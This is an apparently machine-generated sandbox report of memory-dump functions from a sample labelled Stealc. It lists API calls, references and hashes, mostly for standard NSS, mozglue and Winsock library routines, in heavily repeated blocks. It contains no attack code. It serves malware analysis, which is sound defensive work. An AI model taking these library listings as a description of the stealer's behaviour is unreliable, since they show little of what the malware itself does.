
Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: d5e51057a05767519fab2ab4e31125e4961539a17dcf617315058b79e36cd001
Instruction ID: 6ea6167814c60ccb25bdc787bb2e7b6e5717001953b1b6922c96effba9441c79
Opcode Fuzzy Hash: d5e51057a05767519fab2ab4e31125e4961539a17dcf617315058b79e36cd001
Instruction Fuzzy Hash: 7301F472B0441457E731916CEE81BEB31588B8765DF080C31F809EBB01F635D90943A3

Function 6C9ABDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABDC3
free.MOZGLUE(?,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABDE9
free.MOZGLUE(?,00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABE21
free.MOZGLUE(00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABE32

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: a28b07bbd8be6a6b342a3be4ef07cc9e15456154be08f27c57a39a07b5c43543
Instruction ID: 1e3273a31599c34576992007b0fb8abb6558e7889518d35b334da9ac7b3f3904
Opcode Fuzzy Hash: a28b07bbd8be6a6b342a3be4ef07cc9e15456154be08f27c57a39a07b5c43543
Instruction Fuzzy Hash: EB1106B6B0DA94DFDF40DF69E849B023BB9AB4A254B280029D52AC7710E731A415CF91

Function 6C9A7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C9A7C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7C83
malloc.MOZGLUE(00000001), ref: 6C9A7C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C9A7C9F
PR_GetCurrentThread.NSS3 ref: 6C9A7CAD

Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: a65d072c8470ba5ccb85ac168c8e2d2de4b6a7097d9ff77774d8ea7f43e37ca9
Instruction ID: ed6012ac31bbf85898e0dec7c4a57116f124bb666d46f35645418fc26a5bd790
Opcode Fuzzy Hash: a65d072c8470ba5ccb85ac168c8e2d2de4b6a7097d9ff77774d8ea7f43e37ca9
Instruction Fuzzy Hash: F6F0C2F19102167BEB009FBA9C099577B6CEF25265B118435EC09C3B00E734E126CAE5

Function 6C9AADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C9AA6D8), ref: 6C9AAE0D
free.MOZGLUE(?), ref: 6C9AAE14
DeleteCriticalSection.KERNEL32(6C9AA6D8), ref: 6C9AAE36
free.MOZGLUE(?), ref: 6C9AAE3D
free.MOZGLUE(00000000,00000000,?,?,6C9AA6D8), ref: 6C9AAE47

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 36bbbb861e887f34f1244913bb0f442557b0e56d754d1acd0805a9b3a01c3b8b
Instruction ID: a3f7b5d59ff7c6abb712f052a0c08b225ebb831ae9d8f82e9542208d98d63717
Opcode Fuzzy Hash: 36bbbb861e887f34f1244913bb0f442557b0e56d754d1acd0805a9b3a01c3b8b
Instruction Fuzzy Hash: CEF09676201A01A7CF10AFA8E808957BB7CBF8A7757340328E57A83940D731E116CBD5

Function 6C837C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C837D35

Strings

%s at line %d of [%.10s], xrefs: 6C837D2E
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C837D13, 6C837D1F, 6C837D47, 6C837D53, 6C837D5F
database corruption, xrefs: 6C837D29

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 389eb1f8eda7d1c22b0256cf560f2fee31a8dc171959a15d370e78d7a2565ab9
Instruction ID: f22110c7e4f3fe7860f38be6ba5e65bf4fceb228ab2037e4cc0e06fdfe55ef17
Opcode Fuzzy Hash: 389eb1f8eda7d1c22b0256cf560f2fee31a8dc171959a15d370e78d7a2565ab9
Instruction Fuzzy Hash: B9311631E04239D7C721CF9DCA809B9B7F1AF84309B5969A6E44CB7B89D270E841C7E0

Function 6C826C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C826D36

Strings

%s at line %d of [%.10s], xrefs: 6C826D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C826D20
database corruption, xrefs: 6C826D2A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: b9e73ed574a18d439a71c08ff691a85182ffff6a249567f5cbbe9fa299470e4f
Instruction ID: a621bec27ece7e816682750727e999f456a435609f566a016d4cbe8b25d4cebc
Opcode Fuzzy Hash: b9e73ed574a18d439a71c08ff691a85182ffff6a249567f5cbbe9fa299470e4f
Instruction Fuzzy Hash: 852102306043099BC3308E19CA45B5AB7F5AF80309F148D29D8499BF51E376F9888BD2

Function 6C95CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C95CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C95CC7B), ref: 6C95CD7A
Part of subcall function 6C95CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C95CD8E
Part of subcall function 6C95CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C95CDA5
Part of subcall function 6C95CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C95CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C95CCB5
memcpy.VCRUNTIME140(6C9F14F4,6C9F02AC,00000090), ref: 6C95CCD3
memcpy.VCRUNTIME140(6C9F1588,6C9F02AC,00000090), ref: 6C95CD2B

Part of subcall function 6C879AC0: socket.WSOCK32(?,00000017,6C8799BE), ref: 6C879AE6
Part of subcall function 6C879AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8799BE), ref: 6C879AFC

Part of subcall function 6C880590: closesocket.WSOCK32(6C879A8F,?,?,6C879A8F,00000000), ref: 6C880597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C95CCB0

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: f77382f225e633991e773b5e934310ffaee92a962bced7cb361afe3f818e6bd7
Instruction ID: 08dee7acb9474ace5532a4f8839c2ad7297925b1996929e1d7b8bd1502308a40
Opcode Fuzzy Hash: f77382f225e633991e773b5e934310ffaee92a962bced7cb361afe3f818e6bd7
Instruction Fuzzy Hash: D11181F1B083405EDB019FAEAC06B867AB8A357318F201439E42ACFF41E771C4158BE2

Function 6C901D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C901D8F

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C901DA6

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C901E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C901ED0

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: 2fb13c7974561cd73ffc18ee23241ed0c924a7f65008a1df1728d97161605cc9
Instruction ID: 63945b5d85713102e9e6fe0344db7c965adf2817f592c7b8b772a1ceb764f794
Opcode Fuzzy Hash: 2fb13c7974561cd73ffc18ee23241ed0c924a7f65008a1df1728d97161605cc9
Instruction Fuzzy Hash: 36516775A00309CFDB10CF98D884BAEB7BAFF4A318F144529E81A9B750D731E945CB90

Function 6C967DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C967E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C967EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C967EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C967ED8

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: bcef3f836fcd4a20b4dd23739383d81d28b392f668e00ee6f84176eecd25ec81
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: 2F31B5B1A001118FDB05CF09DC9099ABBE2FFC831871B8169C8585BB61EB71EC55CBD1

Function 6C896C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C896C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C896CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C896CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C9B8FE0), ref: 6C896CFE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: f7ae0ae310374cb61c53667eecbc92e0c668cfe787217ddf9e2acfaf7fa45aa4
Instruction ID: 7edac3fcd97e11a26d00b9aac077547ee4245a3f67b747204a97d22f37366894
Opcode Fuzzy Hash: f7ae0ae310374cb61c53667eecbc92e0c668cfe787217ddf9e2acfaf7fa45aa4
Instruction Fuzzy Hash: AB3170B1A002169FEB18CF69C951ABFB7F5EB89248B14483DD915D7710EB319905CBE0

Function 6C906DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C906E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C906E57

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C906E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C906EAA

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: fd8bd86ba599021db9bb22213885ab8c6ee328352176bbcb4a49c5d776e85040
Instruction ID: 9e1df9276289cb65c551e9ff1ca887d4db6a41b88baef44e0a385fdb13d3196f
Opcode Fuzzy Hash: fd8bd86ba599021db9bb22213885ab8c6ee328352176bbcb4a49c5d776e85040
Instruction Fuzzy Hash: 5231C172710712EEDB145F34DC043A6B7A9AB1131AF20063CDC99D6A80EB30F4E8CB91

Function 6C8EDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C8EDDB1,?,00000000), ref: 6C8EDDF4

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C8EDDB1,?,00000000), ref: 6C8EDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C8EDDB1,?,00000000), ref: 6C8EDE17

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C8EDE80

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: d93d77b881e9bb22bc0f4dfb7296e019c3236395f4f7ca82e39db3ba6b1961b0
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: FA31C9B19017439BE720CF5AC984652B7A4BFEA318B14962ADC1C87B01E771E498CB80

Function 6C8DFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C8B5ADC,?,00000000,00000001,?,?,00000000,?,6C8ABA55,?,?), ref: 6C8DFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8DFE5F
PR_Unlock.NSS3(78831D74), ref: 6C8DFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C8DFED6

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 7dbfafb133aa3677fc6cb57637c3c0cb09eaf7471af9f2e3c92c3e1100e1246c
Instruction ID: fc1ecba206b8c3111cae0f572bcce0779aef7116f1dc527f77e557dc4bc410a1
Opcode Fuzzy Hash: 7dbfafb133aa3677fc6cb57637c3c0cb09eaf7471af9f2e3c92c3e1100e1246c
Instruction Fuzzy Hash: E9213431A00626ABD720AF68DA4479A7374BF25358F1A0924DC08ABE01E730F924CBD0

Function 6C891EC0 Relevance: 6.1, APIs: 4, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891EE2

Part of subcall function 6C8F1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C891D97,?,?), ref: 6C8F1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891F13
DER_DecodeTimeChoice_Util.NSS3(?,6C894CA0,?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891F37
DER_DecodeTimeChoice_Util.NSS3(?,6C894C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891F53

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID:
API String ID: 3216063065-0
Opcode ID: e2e60592cd46f9a4192ec292d69f3b19ac4d4ad40421fb5153651ea9ea41f892
Instruction ID: c43e7d3ecf0af50f69c6b06c6c4fc91e27a8ccdf982d28bdc5bd836876a318ab
Opcode Fuzzy Hash: e2e60592cd46f9a4192ec292d69f3b19ac4d4ad40421fb5153651ea9ea41f892
Instruction Fuzzy Hash: 422183B1518259ABC760CF2DDE00A9BB7EDAB94699F000D29E855C3A40F331E519C7A2

Function 6C902DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C902E08

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
